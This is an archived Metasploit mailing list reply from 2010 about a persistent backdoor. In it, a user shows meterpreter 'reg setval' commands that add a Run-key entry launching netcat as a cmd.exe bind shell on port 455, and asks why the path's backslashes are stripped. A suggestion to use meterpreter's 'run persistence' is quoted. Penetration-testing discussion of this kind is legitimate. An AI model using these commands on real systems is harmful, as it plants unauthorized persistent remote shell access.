Metasploit mailing list archives

Re: Persistent Backdoor

From: Eric <dkn4a1 () gmail com>
Date: Tue, 5 Oct 2010 23:14:42 +0530

On Mon, Oct 4, 2010 at 7:10 PM, David Kennedy <kennedyd013 () gmail com> wrote:

Why not use run persistence from meterpreter?


But, what if I want to manipulate other registry entries?

AFAICS, some escape character problem with this, coz even after
executing either of commands, the value set is

meterpreter > reg queryval -k
HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:windowssystem32nc.exe -Ldp 455 -e cmd.exe


Any idea?


On Oct 4, 2010 9:36 AM, "Eric" <dkn4a1 () gmail com> wrote:

Hi,

meterpreter > reg setval -k
HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d
"C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe"
nor
meterpreter > reg setval -k
HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d
"C:\\windows\\system32\\nc.exe -Ldp 455 -e cmd.exe"

doesn't seem to work for me :-(
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

Persistent Backdoor Eric (Oct 04)
- Re: Persistent Backdoor David Kennedy (Oct 04)
  - Re: Persistent Backdoor John Nash (Oct 04)
  - Re: Persistent Backdoor Eric (Oct 05)
  - Re: Persistent Backdoor Tom Van de Wiele (Oct 09)
    - Re: Persistent Backdoor Miguel Rios (Oct 10)
    - Re: Persistent Backdoor Sherif El-Deeb (Oct 10)